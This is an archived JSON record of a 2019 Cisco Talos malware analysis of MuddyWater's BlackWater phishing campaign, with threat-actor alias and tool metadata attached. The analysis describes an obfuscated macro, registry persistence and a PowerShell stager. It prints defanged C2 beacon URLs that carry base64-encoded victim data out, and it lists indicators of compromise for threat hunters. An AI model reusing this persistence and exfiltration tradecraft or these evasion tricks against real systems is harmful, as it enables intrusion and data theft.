{
	"id": "a953f9a0-2c8e-4695-b2d0-81f7c9fbe21d",
	"created_at": "2026-04-06T00:10:38.077569Z",
	"updated_at": "2026-04-10T03:34:22.753365Z",
	"deleted_at": null,
	"sha1_hash": "f25a7e7aa5d804e1e37ddf35bee341acd0461823",
	"title": "Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 196234,
	"plain_text": "Recent MuddyWater-associated BlackWater campaign shows signs of\r\nnew anti-detection techniques\r\nBy Cisco Talos\r\nPublished: 2019-05-20 · Archived: 2026-04-02 11:43:52 UTC\r\nMonday, May 20, 2019 11:00\r\nBy Danny Adamitis, David Maynor, and Kendall McKay.\r\nCisco Talos assesses with moderate confidence that a campaign we recently discovered called \"BlackWater\" is associated\r\nwith suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added\r\nthree distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater's\r\ntactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a\r\nPowerShell-based backdoor onto the victim's machine, giving the threat actors remote access. While this activity indicates\r\nthe threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains\r\nunchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs.\r\nIn this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish\r\npersistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a\r\ncomponent of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This\r\ncould allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a\r\nrequest to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would\r\ncommunicate with a different C2 and send back the data in the URL field. 
This would make host-based detection more\r\ndifficult, as an easily identifiable \"errors.txt\" file would not be generated. The threat actors also took additional steps to\r\nreplace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara\r\nrules.\r\nThis activity shows an increased level of sophistication from related samples observed months prior. Between February and\r\nMarch 2019, probable MuddyWater-associated samples indicated that the threat actors established persistence on the\r\ncompromised host, used PowerShell commands to enumerate the victim's machine and contained the IP address of the\r\nactor's command and control (C2). All of these components were included in the trojanized attachment, and therefore a\r\nsecurity researcher could uncover the attackers' TTPs simply by obtaining a copy of the document. By contrast, the activity\r\nfrom April would require a multi-step investigative approach.\r\nBlackWater document\r\nTalos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat\r\nactor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target\r\nentities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing\r\nemails. One such trojanized document was created on April 23, 2019. The original document was titled \"company\r\ninformation list.doc\".\r\nOnce the document was opened, it prompted the user to enable the macro titled \"BlackWater.bas\". The threat actor\r\npassword-protected the macro, making it inaccessible if a user attempted to view the macro in Visual Basic, likely as an anti-reversing technique.\r\nhttps://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html\r\nPage 1 of 3\n\n
The \"Blackwater.bas\" macro was obfuscated using a substitution cipher whereby the characters are\r\nreplaced with their corresponding integer.\r\nThe macro contains a PowerShell script to persist in the \"Run\" registry key,\r\n\"KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding\". The script then called the file\r\n\"\\ProgramData\\SysTextEnc.ini\" every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight\r\nstager.\r\nThe stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text\r\nversion of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when\r\nthey targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the\r\nPowerShell trojan. The actors have made some small changes, such as altering the variable names to avoid Yara detection\r\nand sending the results of the commands to the C2 in the URL instead of writing them to file. However, despite these\r\nchanges, the functionality remains almost unchanged. Notably, a number of the PowerShell commands used to enumerate\r\nthe host appear to be derived from a GitHub project called FruityC2.\r\nThis series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300\r\nseconds. An example of this beacon is \"hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater\". Notably, the\r\ntrojanized document's macro was also called \"BlackWater,\" and the value \"BlackWater\" was hard coded into the PowerShell\r\nscript.\r\nNext, the script would enumerate the victim's machine. 
Most of the PowerShell commands would call Windows\r\nManagement Instrumentation (WMI) and then query the following information:\r\nOperating system's name (i.e., the name of the machine)\r\nOperating system's OS architecture\r\nOperating system's caption\r\nComputer system's domain\r\nComputer system's username\r\nComputer's public IP address\r\nThe only command that did not call WMI was for the\r\n\"System.Security.Cryptography.MD5CryptoServiceProvider.ComputerHash\", or the command to obtain the security\r\nsystem's MD5 hash. This was likely pulled to uniquely identify the workstation in case multiple workstations were\r\ncompromised within the same network. Once the host-based enumeration information was obtained, it was base64-encoded\r\nand then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file.\r\nA copy of the encoded command is shown below:\r\nhxxp://82[.]102[.]8[.]101/bcerrxy.php?\r\nriHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0\r\nOnce decoded, the output of the above command became clear:\r\nhxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\\admin*192.168.000.01\r\nConclusion\r\nIn addition to the new anti-detection steps outlined in this report, the MuddyWater actors have made small modifications to\r\navoid common host-based signatures and replaced variable names to avoid Yara signatures. These changes were superficial,\r\nas their underlying code base and implant functionality remained largely unchanged. However, while these changes were\r\nminimal, they were significant enough to avoid some detection mechanisms. Despite last month's report on aspects of the\r\nMuddyWater campaign, the group is undeterred and continues to perform operations. 
Based on these observations, as well\r\nas MuddyWater's history of targeting Turkey-based entities, we assess with moderate confidence that this campaign is\r\nassociated with the MuddyWater threat actor group.\r\nIndicators of compromise\r\nHashes\r\n0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad\r\n9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7\r\n0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2\r\nA3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da981\r\n6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad\r\nBef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6\r\n4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60\r\n576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf\r\n062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717\r\nURLs\r\nhxxp://38[.]132[.]99[.]167/crf.txt\r\nhxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater\r\nhxxp://82[.]102[.]8[.]101/bcerrxy.php?\r\nhxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php\r\nhxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php\r\nhxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/\r\nhxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df\r\nhxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh\r\nhxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG\r\nCoverage\r\nDoc.Dropper.Pwshell::malicious.tht.talos\r\nSource: https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html"
	],
	"report_names": [
		"recent-muddywater-associated-blackwater.html"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434238,
	"ts_updated_at": 1775792062,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f25a7e7aa5d804e1e37ddf35bee341acd0461823.pdf",
		"text": "https://archive.orkl.eu/f25a7e7aa5d804e1e37ddf35bee341acd0461823.txt",
		"img": "https://archive.orkl.eu/f25a7e7aa5d804e1e37ddf35bee341acd0461823.jpg"
	}
}